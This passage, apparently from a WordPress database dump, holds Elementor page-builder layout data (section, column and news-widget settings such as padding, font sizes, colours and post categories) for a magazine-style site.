(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1078,402,'_elementor_version','0.4'),(1079,402,'_elementor_css','a:3:{s:4:\"time\";i:1508850518;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1080,403,'_elementor_edit_mode','builder'),(1081,403,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_